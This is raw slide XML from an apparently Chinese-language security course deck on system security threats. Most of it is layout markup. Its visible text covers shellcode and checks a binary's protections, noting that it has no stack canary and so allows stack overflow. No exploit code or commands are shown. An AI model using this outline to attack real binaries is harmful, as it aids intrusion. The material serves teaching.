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797" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId19"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId20"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="382" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="388" r:id="rId7"/>
    <p:sldId id="332" r:id="rId8"/>
    <p:sldId id="1086" r:id="rId9"/>
    <p:sldId id="1126" r:id="rId10"/>
    <p:sldId id="1097" r:id="rId11"/>
    <p:sldId id="1127" r:id="rId12"/>
    <p:sldId id="1128" r:id="rId13"/>
    <p:sldId id="1131" r:id="rId14"/>
    <p:sldId id="1129" r:id="rId15"/>
    <p:sldId id="1134" r:id="rId16"/>
    <p:sldId id="1132" r:id="rId17"/>
    <p:sldId id="331" r:id="rId18"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId2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26C039E-41CB-491E-B6C5-F30A1A9A93A2}">
          <p14:sldIdLst>
            <p14:sldId id="382"/>
            <p14:sldId id="258"/>
            <p14:sldId id="388"/>
            <p14:sldId id="332"/>
            <p14:sldId id="1086"/>
            <p14:sldId id="1126"/>
            <p14:sldId id="1097"/>
            <p14:sldId id="1127"/>
            <p14:sldId id="1128"/>
            <p14:sldId id="1131"/>
            <p14:sldId id="1129"/>
            <p14:sldId id="1134"/>
            <p14:sldId id="1132"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="无标题节" id="{4B363297-46D3-4B85-AFDA-CADAF7415C97}">
          <p14:sldIdLst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2" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="73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35390"/>
    <a:srgbClr val="ED7D31"/>
    <a:srgbClr val="FFFF66"/>
    <a:srgbClr val="CCFF33"/>
    <a:srgbClr val="014B88"/>
    <a:srgbClr val="898989"/>
    <a:srgbClr val="494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4" autoAdjust="0"/>
    <p:restoredTop sz="86597" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="798" y="84"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2137"/>
        <p:guide pos="3840"/>
        <p:guide pos="332"/>
        <p:guide pos="73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2373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E3BA574-909C-41C2-A0FD-4FCAC9F4EC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C22EA6-F610-4351-A30E-426F51E1FC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E72DBFB-11A9-4AE9-8928-3905FD1BBC5E}" type="datetimeFigureOut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260ECB-F4A7-46EB-95DF-A2A7AA5B49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86ABD2-813A-4669-ABB0-B1C467E68E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8F02313-81FD-4286-B045-1C6094191D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ED61779-31CC-4E4F-BBC1-48BFF14C98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E19952-850C-440F-9FAF-DD0DE12EB33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D12AA0C-F6F6-4310-9AA5-FD62DFAB7F9C}" type="datetimeFigureOut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A11FBB4-5CFD-49E0-93C4-D82499851F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EE50FE55-3156-4EBA-ACE9-B9A988576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4E5A16-4985-4F76-AC64-5C384257E7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844411-3FDC-4C08-9B0E-BB42E0CC85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124352C-8717-4936-95C7-D5081F1E1B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240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57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24352C-8717-4936-95C7-D5081F1E1BF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887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24352C-8717-4936-95C7-D5081F1E1BF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7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24352C-8717-4936-95C7-D5081F1E1BF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9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24352C-8717-4936-95C7-D5081F1E1BF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56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24352C-8717-4936-95C7-D5081F1E1BF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809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24352C-8717-4936-95C7-D5081F1E1BF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57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24352C-8717-4936-95C7-D5081F1E1BF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367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24352C-8717-4936-95C7-D5081F1E1BF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364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24352C-8717-4936-95C7-D5081F1E1BF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806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24352C-8717-4936-95C7-D5081F1E1BF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49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27EE4-DA92-415E-A174-F64D4AC7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22F6BB7-73AE-4150-ADD2-47380D2D6E22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C6EE86-5A4C-4A43-94E4-2ED5559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A3711-CE04-43DE-97EE-512926A0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D91488-6DB2-4E81-BEA5-9DE5C637356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079264"/>
      </p:ext>
    </p:extLst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6D7C0-922D-4873-9B55-B9259D7A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F205D84-10A7-421F-8E78-C85803011123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F74B6-9BC4-4101-92D5-AA18A1FE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BB455-85B3-4A25-8AA6-166121A0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AE36B6A-D179-4D6F-8FB6-57E029AA30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24761"/>
      </p:ext>
    </p:extLst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BA7A3-533F-4AB1-B5E3-411D1368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2724CFD-866E-47B7-A3E0-1AA89FB6ECD3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0A19D-940D-47B5-8F85-393C41D0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7A276-2342-46C9-B67A-88B7428E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C6A2FE9-B416-42C4-91C0-D8E46A9C1C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38955"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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13368-F825-4718-8475-D88F7EC2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CC9AA8A-9898-4E8D-834C-43D932FE3E89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53F9C-70A6-4E9A-8ABF-56A7F5B2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66586A-5F08-4C80-9BC0-96642BE7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A1540AD-7202-47B2-B68B-557B23B3B96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616530"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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9028F-C21E-48DB-AE13-4D164FBE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E766F98-BE16-48C9-8A4E-B34208EC5368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2F4805-3B33-428B-9C7C-C5898A5A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418B6-35F8-4304-8A23-9C392AFD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A7AF3C5-D60E-4A2A-9C9C-4CA2994BED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256403"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition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445ED-EA0E-4796-B4C1-467D370F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A13D33B-F518-47A1-93D9-FA910FD77764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364127-343A-4F1E-9ACE-38AD7056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46023-0B1A-43D5-A6EA-272A767A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B3A06FB-DFB8-42C9-89E6-49932C5D86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578466"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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9F7879-EC5D-4E22-8116-6D800BCB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256BA52-D7E3-4037-80DE-68B89CE5161C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816EBB-6621-4855-8ECD-960B57E5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8E49E7-0B02-4FFE-9BDC-B7F13634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3B02D12-4B4E-48AE-9CE1-D800056D78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901551"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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6854A6-C6B5-43FC-966E-7EE2154D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56C1DB9-B215-4AAE-BFC3-A2CFD18E714A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12C5BC-51E6-43DD-B6E0-4230FD9D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0A79B0-7CE5-491B-B345-B021585D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27AA904-9226-4C69-9F9B-7379F863C2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832526"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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D33686-125C-43E4-9D0F-8D246D8F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991A25B-649D-4CD7-AA05-F7329916455A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92E51E-A7B5-48CE-833C-23D5A42C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7602C-439F-4AC5-B552-00DE49B8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85A4661-3739-4C2F-864A-7A40592A99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433970"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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657118-2E21-435E-BA03-DA5AAA79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DF9452D-BA7F-4836-B525-5DDBCDB78BCB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9A5C4B-B2B4-44BF-A559-D1F85F70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650EDC-1B57-4B8C-9B7E-9ECC19D0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34A7E82-DC80-4440-B2DC-0EC584EB2A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837038"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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8F8C0-1B52-4499-8E8F-08BA451C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ABB417A-0309-43AD-99D4-445E27B57FB5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17CDFD-ACEE-47C3-AA0B-3B7C8005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04BE2C-9CA7-4930-AEAA-BC5B4D12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C9E40F0-1D22-41D4-AA84-247DB44A59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909129"/>
      </p:ext>
    </p:extLst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67E17-D5EC-4272-B990-BC1705DB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EF7605-80DE-4147-80CF-392C69F43AB1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D952B-0C76-4B1B-93E4-34FF19D5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8F45B-B0C9-4E7C-8A48-FF2AE999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16D2DA-051E-4ADB-807E-922BCF2B21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99216"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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7B91B2-1A59-4109-AF3B-4933DDC0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347556C-B438-4F34-8B2A-32A62C0C37A0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B86001-21CA-4D5E-A6F8-9C41AD5E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87F92D-BA41-44F7-B485-867FC889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82BDAB5-1466-412D-8F8F-3D4139CABA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555115"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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B3328-9A6A-4E5F-B050-3E998223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8313544-3F26-488B-A259-B088E91B7245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33E5A-2A5A-43A9-869F-A1A01466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F69CD9-1D23-4492-89E4-672EF09A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B5B366D-2C34-401C-A4EB-291451A2F8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252575"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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7483D-EBFA-4AE5-B4A7-23285F56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3AFBF4-539F-4D89-9952-E06D30B5BDBA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F2823-B34B-4DA6-8603-DA1F8446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F3B90-6E56-4867-A5BF-DB23DDD8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5F35E70-88C2-486F-A033-D47EB7EB68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788446"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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8A2B8D-3613-4110-B322-414BEDB5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EBEEE-64CA-4140-9432-D8A5043DB909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4478B-FF92-4C20-A49E-7D99AF10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C27AA-1040-4E24-B68A-AAA70A58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8D000-2117-46F6-A74A-78F035141EF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677162"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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2D32A-1A49-47B8-8D34-212A91D0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CDE17-5385-4E46-B7C8-C2745D8F33A7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EB0FE7-6131-42F2-A2C8-9016A2ED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9ED90-F65E-418D-804C-0A7D0464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464D1-34A8-45D5-8752-039D7D7B2E4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782794"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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24589-44D8-4610-BAC9-6F30BFAB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2F431-003B-49E3-9068-A44A5B889EF0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75044-A289-41AF-B355-3D315F76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FBCE9-E8EE-49C5-A50B-96688D22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1D001-9C59-4584-B7A2-3E33446F417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735708"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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EE619B-1F4C-46D7-8D96-62539C1A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44F41-76CE-4316-A586-57E2ECBA2F24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49C5471-3786-4B18-9F60-1686CBA0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DB864A1-1781-4D35-B4D8-5DF198F3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5922C-54E9-42F0-A46E-5711B897180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881627"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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007FAC8-8101-4E40-AAE1-7BA73C69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A8622-BAB4-4181-85FD-C459611072A0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026975E-385B-4AF6-80DE-9EDE8467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42AD42F-8A66-4515-8BE1-7C6915E3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ABBBB-80CC-473F-B6FF-10553224651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133323"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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66E942D3-C083-4687-BC6C-9A7ED9DD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46C57-F497-4DBD-9A01-1DA4A3B6A98C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B3D0A30-FC47-4C43-8F5A-11C89ADD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F57EF35-8BD2-4DB5-BEB4-4382B895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61413-8F6C-4276-BA01-FFD0D532294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935055"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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B33236E-5AF0-495D-9C18-496AD1CD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0C29-D90C-4C1D-9F4B-B09A661C70DE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EF0BB24-936D-4261-A324-A466D8ED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9F50CD4-80A5-480F-9827-0FEE2605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1C642-DDC7-4DE2-B4A4-1A6D05AF046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729207"/>
      </p:ext>
    </p:extLst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78736-FC24-444F-A7CB-ED19433A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D7362CD-761C-44C5-9097-743FB994175D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B52F45-7304-43D9-8B29-96364625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9E4C3E-4CED-476B-BDC6-C3C94159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B10067D-84DD-4232-9743-BD8A11D995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143840"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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41E16D1-6150-457A-86FC-2E686568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FC05F-C383-4C57-A4A2-444D3E00A822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4003AD7-8AB7-47A9-843A-43FA369B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57B4721-B6E7-456D-A87B-F198BF99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E6308-4F60-4F31-AD18-6119C394D1C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567889"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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99D6737-5B87-4766-BAD0-21DF1110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2AE06-4AE8-49A5-A2C9-5F525AC8DB8A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4CD4151-9C2E-424F-859E-1D96E919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1F00624-A26C-4348-AAFC-7701C063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5457D-077B-4426-9E5C-5778AD7F76C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156919"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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2CAE36-0A06-475D-A475-01F44F8F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04082-2927-4AAE-8289-169516D51ECC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58AF8-D318-4C99-A129-EFD3779C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A29F5-5501-49AA-B2A2-DC4265C0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B2E90-017B-4ABC-ACE4-7E7D739A715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056483"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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67D15-FA22-457E-A56D-4FC68B57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ACC8D-654C-44AD-A6AB-4EBEE4B038D8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BA51E-40C3-49C1-A7A4-8515ABFB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6C361-5568-4F9E-B195-129C9377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C8DB4-681C-4B3D-BB88-1BC3730F717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360702"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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6EBEEE-64CA-4140-9432-D8A5043DB909}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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8D000-2117-46F6-A74A-78F035141EF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671250"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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3CDE17-5385-4E46-B7C8-C2745D8F33A7}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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F464D1-34A8-45D5-8752-039D7D7B2E4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305965"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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92F431-003B-49E3-9068-A44A5B889EF0}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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1D001-9C59-4584-B7A2-3E33446F417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866"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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444F41-76CE-4316-A586-57E2ECBA2F24}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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5922C-54E9-42F0-A46E-5711B897180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34073"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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4A8622-BAB4-4181-85FD-C459611072A0}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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ABBBB-80CC-473F-B6FF-10553224651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976675"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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746C57-F497-4DBD-9A01-1DA4A3B6A98C}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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861413-8F6C-4276-BA01-FFD0D532294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547436"/>
      </p:ext>
    </p:extLst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0A35D-840E-4764-9690-F0CDBF06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2E5028F-F7FA-4C02-AF43-ADC2FA64F4CF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310379-407E-430E-AF18-900060B5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4E102B-059C-4C6D-9C2D-655D5547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8F09AB5-2BA4-42BD-AA60-137EB0B67A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364708"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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50C29-D90C-4C1D-9F4B-B09A661C70DE}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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1C642-DDC7-4DE2-B4A4-1A6D05AF046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357845"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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6FC05F-C383-4C57-A4A2-444D3E00A822}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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7E6308-4F60-4F31-AD18-6119C394D1C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202240"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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82AE06-4AE8-49A5-A2C9-5F525AC8DB8A}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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5457D-077B-4426-9E5C-5778AD7F76C8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282161"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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604082-2927-4AAE-8289-169516D51ECC}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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B2E90-017B-4ABC-ACE4-7E7D739A715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843737"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:pull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CACC8D-654C-44AD-A6AB-4EBEE4B038D8}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0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DC8DB4-681C-4B3D-BB88-1BC3730F717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213744"/>
      </p:ext>
    </p:extLst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293C10-BA84-4FDD-B392-7E9CE0EB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F12B91E-37BA-4130-AB62-5D876486F501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A71101-BE9D-4B25-9461-2065E14F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D95D4E-B5C1-4FD5-B44E-DA32BE0B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368680-AF02-4A8D-A506-B9110A51EE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125303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7F4E77-4641-4E07-965E-60034D37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6863292-C300-46E4-80B7-A41FDA14976E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AACE7A-E972-4D1D-A6C1-1791C9CF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E786C0-514D-4FE4-898D-926B9735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5A0261A-D148-4A65-BD74-7BEE0C2829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41813"/>
      </p:ext>
    </p:extLst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21C180-15C7-41DE-B017-48614072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DB42958-1CBE-4FFC-95B9-328E4F2864F7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EE3AFF-24AB-45CE-B34E-DBF7A39E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918DD6-5A2F-45AE-B619-CF24905F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28957A5-6ADA-481B-9974-3DD94FA049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176995"/>
      </p:ext>
    </p:extLst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64A4A7-8625-49BE-9952-186BE870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2285CC4-B29E-4BE5-A947-80AA14E6B0AD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AF53C7-4F12-468F-BB8F-F3E5C2BA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B0A91A-361E-43DB-AE76-AA5402B3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56ACD85-8CA3-4471-B3DB-1A637B42B0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832209"/>
      </p:ext>
    </p:extLst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794C66-7D73-4DA2-A9CC-D0C5597A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582C1B0-EAE3-4641-B442-156315F5FC5D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17BB1A-F481-4AD3-8B15-9F958F0B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5B0B97-74DA-44BF-9EB3-951860C9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433DB27-8C67-43C4-976F-67700F93AF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127450"/>
      </p:ext>
    </p:extLst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ransition>
    <p:pull dir="r"/>
  </p:transition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041636B-3331-47F6-B046-218C1BBC596A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3176"/>
            <a:ext cx="4531784" cy="6856413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="014B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65" noProof="1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         </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" noProof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ransition>
    <p:pull dir="r"/>
  </p:transition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E1C00-B73C-4002-9FF5-BB07D62E8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19586C4-3E7D-4506-BFAE-27F8FC01E556}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2023-02-23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60251-5900-4F40-A887-BFC9C0310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9DB0F-C8CE-4B39-81DD-78E6053A7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1774A31-6F71-4597-BF09-CE7FFF65C9A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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3077" name="组合 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{224D7A8B-28A4-4713-89B3-E43DD73088D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-42863"/>
            <a:ext cx="12192000" cy="6908801"/>
            <a:chOff x="0" y="-51"/>
            <a:chExt cx="10800" cy="816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32311E-7A00-4B33-988F-00DB61584E0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-32"/>
              <a:ext cx="10800" cy="793"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0353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pic>
          <p:nvPicPr>
            <p:cNvPr id="3079" name="图片 9" descr="logo">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2D8B16-9363-4247-80CA-703D302290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" y="-51"/>
              <a:ext cx="1743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718D94F-DC82-438A-BEB2-304AD04ED56B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8013"/>
              <a:ext cx="10800" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0353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>
    <p:pull dir="r"/>
  </p:transition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A796FC8-7E4C-8196-E2D2-18178DC67BA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-42863"/>
            <a:ext cx="12192000" cy="6908801"/>
            <a:chOff x="0" y="-51"/>
            <a:chExt cx="10800" cy="816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D244150-8E0A-8E1B-AA6B-E7D8C47FEBA7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-32"/>
              <a:ext cx="10800" cy="793"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0353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pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="图片 9" descr="logo">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61D727DC-9ED3-19BA-3B7D-FDD4780401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" y="-51"/>
              <a:ext cx="1743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7F96497-AF23-EC8F-DEB9-11072A6D3D97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="8013"/>
              <a:ext cx="10800" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0353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6644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ransition>
    <p:pull dir="r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82B9109-119E-44D8-A798-E237A771F93A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1983080"/>
            <a:ext cx="12192000" cy="2117580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6424D3-D8E6-4048-9FDD-E0E7B40139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7" t="35175" r="23143" b="24864"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="4100660"/>
            <a:ext cx="12192000" cy="275734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4134A77-E795-4821-B45C-42B8E0104B9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407180" y="1941799"/>
            <a:ext cx="11226800" cy="20040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信息系统安全威胁示例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4400" b="1" dirty="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Shellcode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EDACACF-C4F3-4988-89D8-0D9D9A273E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7" r="23143" b="71260"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="0"/>
            <a:ext cx="12192000" cy="19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3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TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B31AB80-4FD1-4823-B6DD-03CFB324A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6" y="107951"/>
            <a:ext cx="46593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操作过程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F6B477-C2B6-462A-08F6-4329B5E4835F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="991194" y="920581"/>
            <a:ext cx="5643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对二进制文件分析，识别二进制文件的安全属性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D5969D-D9A7-5A8F-50B0-87ED52EDB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74" y="1243746"/>
            <a:ext cx="6528212" cy="23766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C6EEC12-AE14-475B-DEBB-120C01150774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997512" y="3947380"/>
            <a:ext cx="860654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555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>1.Relro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>：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PingFang SC"/>
              </a:rPr>
              <a:t>Full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>Relro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>（重定位表只读）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1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>2.Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>：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PingFang SC"/>
              </a:rPr>
              <a:t>No Canary found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>（能栈溢出）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555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>　　</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>3.NX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>： 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PingFang SC"/>
              </a:rPr>
              <a:t>NX enable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
              <a:t>（不可执行内存）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1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PingFang SC"/>
              </a:rPr>
